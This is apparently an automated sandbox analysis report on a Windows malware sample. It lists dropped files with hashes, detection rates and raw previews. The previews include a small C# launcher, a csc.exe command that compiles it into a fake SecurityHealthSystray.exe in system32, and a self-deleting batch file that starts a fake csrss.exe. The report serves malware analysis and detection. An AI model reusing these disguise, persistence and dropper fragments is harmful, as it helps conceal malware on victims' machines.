                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9114540830942968
                                                    Encrypted:false
                                                    SSDEEP:48:6cmJtjuxZ8RxeOAkFJOcV4MKe28didfcvqBHzuulB+hnqXSfbNtm:K9xvxVx9HvklTkZzNt
                                                    MD5:D7CC891D5703DFBA8A76426FF461D1B0
                                                    SHA1:1661ECFDFC61A5865C652C84BFA4BC806F3CAAF5
                                                    SHA-256:32A5B143360B3C19B6AB1C8691ACD10909C45613F016E11720E0ED7FC90FF2C2
                                                    SHA-512:1A4803D83AB4CC387D2275CCACFE981A07513510F5D2B3CD4A63749D2EC93DD8247A93545C253A87FD8D951681A6D4ADA63513FEE812546BEFB6451593FCDAB4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):245
                                                    Entropy (8bit):5.802058177170569
                                                    Encrypted:false
                                                    SSDEEP:6:1BNT3tHoGwvJtktro/ORYLWI4PtCUQcJItxW5mMizwln:xwRtjORYC5wceW4Mizwln
                                                    MD5:C747C899B5B1FD21DF9800EA3721F798
                                                    SHA1:378E7101B32C84B238C526BC51ED0828BA457EF1
                                                    SHA-256:C84304CD623DCA0149B104C6D880C549F87F7A4DE88F391D865E6CD41807FC74
                                                    SHA-512:0F2B4FFA52D5C390B1CD193049F16AA6AEDE34A15BE022097235AF71522A725CBA002416E9066856E25ECA6BDA09C70AF4850BF6AA0DF70F9C324633B59462FC
                                                    Malicious:false
                                                    Preview:OAxdM5dQ5ITilFaZNslkMYjRrpmprKYIBhGFMzv9LHilT7Grc6XklHC0bgvhTyjutLhD9UNY6lZEz78uj4Mvwyh3eQoqEOqXiy1HZCsHt9nAs8BeiB7Zlx75ooitqgTs5BfBF0UgLEBxKgKgOJICQQvu06dve9aMp5FqcAYrrbOhwKuHdBehXRboQvKJWiBLnyHPbdEOuaVzCO8pLWScf3zYeaaqzPVJZC37Cfp97Qw65mmBwf7AP
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (390), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):390
                                                    Entropy (8bit):5.836396234071712
                                                    Encrypted:false
                                                    SSDEEP:6:Pkn1OnEShx90orGo5SioTbk9rmcQ8UdxFAYRrM7En9uyghHBb1kWHi/DZ:F77VxSJTb4rmcQx9uXbS1rZ
                                                    MD5:6EF3DEED3FF571D08621CBAE72D3A92D
                                                    SHA1:5EC540EF96667CF093663514FC887B199E93B51B
                                                    SHA-256:009ED7D9DB3B210E64990171CE64C8156354AAB5C853CCD47DBB67D4BD404AAE
                                                    SHA-512:184B39310392680AB50B2176DC411A0CF7BA5250C8D5A605F21BB56459158995CF3AE3D0A2761D36BB38E55FC26C678D94DD2F3FDF68B8B630656FA44B20C4FE
                                                    Malicious:false
                                                    Preview:1VQABfpMCv5EqkMBHDp5nWEUiFFxz20QY1emuPji4CsX0eo9y54PJlufQ5b5a2XJ5ppzGkQ1dGAlordEaG948kGwH9VyynICpicLyz2OoCvDkI1jcWfT3cLUi3sHOcD0786FPRQlOvP6yDL8IwWbHzIMXHn5Gu9M85FlMvUKG4FINOfert9cFlsI0urHoUedvD737jwWcLVNtA9JlINXuhGWN7vbEMgvalWJQmhH7n93QeYzvigfHHtO7lqAxUSQpjxHoz29lFZGhMGsi6qfqAoS2IMp5hUnVtNrrQK5pg4Brmque7b1nwjp4ePgnNDEvwvy9YBRvu0JFnlQbcK7Fc9jJiwMBoScd0P502uG6JF26akR38EKCF8SwMoblyQGcXqPXp
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with very long lines (943), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):943
                                                    Entropy (8bit):5.910134597980162
                                                    Encrypted:false
                                                    SSDEEP:24:b/xMzUjm+m/qM9i97GU0l8eRVTAdKp347K9eHsUn:b/xHm+mzQ1GUTeRVTAjK9+n
                                                    MD5:23AEB76AD87E6CC58DE0E9E7B8DEACB1
                                                    SHA1:2A5FAE50B55DE5D4C232CBFAC4F1B430E04D1BCA
                                                    SHA-256:98861D786E810EDBA50D7E03C2B8350320C973A8A600564EAE58B0877910D2E4
                                                    SHA-512:0516E131EE7286EC288B37A90229E3287C7C559B7FB5B5A65290BA2B3A52739243E3D4D01A075A0DA76A5D49A09CE1948B78DB5C5EFB3D2BB24D7955EF222D0E
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1396
                                                    Entropy (8bit):5.350961817021757
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1830
                                                    Entropy (8bit):5.3661116947161815
                                                    Encrypted:false
                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                    MD5:C2E0F17D6A14A9837FE55EE183305037
                                                    SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                    SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                    SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK
                                                    Process:C:\Users\user\RuntimeBroker.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):394
                                                    Entropy (8bit):4.98237441051555
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LCcIiFkD:JNVQIbSfhV7TiFkMSfhWLCclFkD
                                                    MD5:BD8118899AE0A6FD8FA9EBA6802A4B3D
                                                    SHA1:E27F7B7A246CCA9E739D776D1EE528839FF86767
                                                    SHA-256:75FB7FABEF1BDF7825FCC492AB43B0C2CB8DEBFA02DEC357CCBAE378555F77B9
                                                    SHA-512:9AA66381E4D59BAC0FE29897EA128A164BB268EA8C5A46748CEB676C063684FB7719A7C41FA0D42AFD8084916FFC947A40087DF6F439988A0650A2208186BA1B
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"); } catch { } }).Start();. }.}.
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):251
                                                    Entropy (8bit):5.060298207677216
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fF6i/z:Hu7L//TRq79cQyN
                                                    MD5:22E63CFDB7A4CE581E47310CEF928C38
                                                    SHA1:4A6CC0FE7FCB4C05003746BD895AF73BDE743FF3
                                                    SHA-256:A5BECAF02B8AD11C171D0A2C7400AB7F0FA478113C3CAC4800DB66433588CE8B
                                                    SHA-512:DB3A50498D3FC2AAB3D52F18C79B40218539AEEB4924B55F3F2D127C36C6C68D52D0253E1427EAD5D1BC73617C6DE1069E148FBA2EC87B1881EF8BEEC4E0360E
                                                    Malicious:false
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.0.cs"
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):752
                                                    Entropy (8bit):5.249182494954674
                                                    Encrypted:false
                                                    SSDEEP:12:KMi/I/u7L//TRq79cQyIKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79tyIKax5DqBVKVrdFAMBt
                                                    MD5:95909131F50D8D08445134092D6725B6
                                                    SHA1:0103E3705D8741C100286D4066A832987903018C
                                                    SHA-256:5F89CF5F944F2167FA1A990B022F1766E9CDF9366CF91C49261301EC6F54D6CE
                                                    SHA-512:C25F8C52633A8828D893824A810A106A50AC972D800D5B53F580438A1E9D694639FDA10D55E23EB2535D27CC223C4BCF842A6E04A0E7078F551B6989A587AD74
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):180
                                                    Entropy (8bit):5.226824091418245
                                                    Encrypted:false
                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5In5qLyCIvBktKcKZG1Ukh4E2J5xAI8SEGLq:hCRLuVFOOr+DER5In5fBvKOZG1923fxO
                                                    MD5:846A9C4ADFA0E0DBEF3B49D8AC8FD4FA
                                                    SHA1:E683D7A8B1E455CF7E53CBE30769945F5D543231
                                                    SHA-256:0BF19314ED272307A12A2E80E4DAB6CB5893A780DBF727081FA292903A778C4D
                                                    SHA-512:C40C304CA80EE167050E2C150CC2D0480521FAA5E63D330B09B9535A055C83D751613655C483DB2ED8081B5DA2638C315AAA8C16AB7655456C7906987181C8DA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\IZdub348jc.bat"
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.373660689688185
                                                    Encrypted:false
                                                    SSDEEP:3:VXXXVd5:VnFd5
                                                    MD5:B13523CBB85A5644874AD912D9D2067A
                                                    SHA1:0DDEEF070EBBB972CBD7441DECDF97EC17F482E3
                                                    SHA-256:1C405BF34B045CD5B0C14332297A8CB6132861E5F6567C6961593429619E0607
                                                    SHA-512:051BE495219AB018515D5A037C02059E8673D8346296A37F9E7196CA9EC4358356297135F1EAD06DBAB3C092DA236FDF416BE46C795ABD766C009608768B8DF3
                                                    Malicious:false
                                                    Preview:SQLQOGFf4JCQuBp2g1IzMpxRl
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Thu Aug 29 22:39:12 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1928
                                                    Entropy (8bit):4.61721999828124
                                                    Encrypted:false
                                                    SSDEEP:24:HTK9AaLz/AAB8HpWwKqxmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:raLz4k8bKqxmslmuulB+hnqXSfbNtmh7
                                                    MD5:15BD07FFB19FE9F308A0D578EBE48FA5
                                                    SHA1:92D4CD296266B7DA5DF815964E4191F6E9F793DE
                                                    SHA-256:41F521A921D98D163FAC63C068851F1C33C37C3840F58FC19A06E5586B09A08D
                                                    SHA-512:EE0ECFC8DADC8B7101BEA4EA88F8EC922047E561F75FCFFE4F0C519BC7007E70FBB13433FB41ADCEA4C259D12E1A813A43F04F6D61D17295903035F0961B5D5A
                                                    Malicious:false
                                                    Preview:L......f.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES2144.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Aug 29 22:39:12 2024, 1st section name ".debug$S"
                                                    Category:dropped
                                                    Size (bytes):1956
                                                    Entropy (8bit):4.552921710688469
                                                    Encrypted:false
                                                    SSDEEP:24:HnO9/OKAVXqH+wKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:5KAlq9KqxmEluOulajfqXSfbNtmh1Z
                                                    MD5:58E3BD35980FBAD0A3E3E7A262F31E76
                                                    SHA1:FF1B1D430A835B6228D8203625F27F9F8ED4054B
                                                    SHA-256:266ABF9D6C4945C3D72FAB86E5A50D16AF1E70C7ADEE1CE1CEBE914167D8007F
                                                    SHA-512:24358D3D23151FB7C558647DF8B387CF8D5B2310D96A961285032C701EA20536D1EB876BD7D740F7F834F9E8A115B2E88B0EA8568CDB33ADE8BB78659CCF8043
                                                    Malicious:false
                                                    Preview:L......f.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES22AB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):224
                                                    Entropy (8bit):5.265590102929044
                                                    Encrypted:false
                                                    SSDEEP:6:hCijTg3Nou1SV+DER5CKvl1vKOZG1923fbwHn:HTg9uYDEfCc/An
                                                    MD5:542C3504160BD006589B414BD76A9DCB
                                                    SHA1:8AEBDC19E5F53D70835D1F7D1AEDF22640424CA1
                                                    SHA-256:93F7E6E6463E3D51CD7B8ECC463B8B99A47DB5717BC83C3FA1120A6612F0DECD
                                                    SHA-512:0787F0BA6FB08F5095C54AE982B7891573BEA4FD098548607A3965C22B59C47865F1E19E0D05D622220C7B836977C0B02D1A4B9C90C16F1A7F3A3CD54C732925
                                                    Malicious:true
                                                    Antivirus:
